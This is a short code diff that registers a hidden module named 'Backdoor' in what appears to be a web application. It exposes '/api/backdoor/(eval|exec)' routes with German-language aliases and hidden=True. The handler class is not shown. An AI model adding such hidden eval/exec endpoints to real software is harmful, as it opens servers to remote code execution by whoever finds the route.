@@ -17,4 +17,18 @@ from __future__ import annotations
 
 import os
 
+from ..utils.utils import ModuleInfo
+from .backdoor import Backdoor
+
 DIR = os.path.dirname(__file__)
+
+
+def get_module_info() -> ModuleInfo:
+    """Create and return the ModuleInfo for this module."""
+    return ModuleInfo(
+        handlers=((r"/api/backdoor/(eval|exec)", Backdoor),),
+        name="Backdoor",
+        description="🚪",
+        aliases=("/api/hintertür", "/api/hintertuer"),
+        hidden=True,
+    )
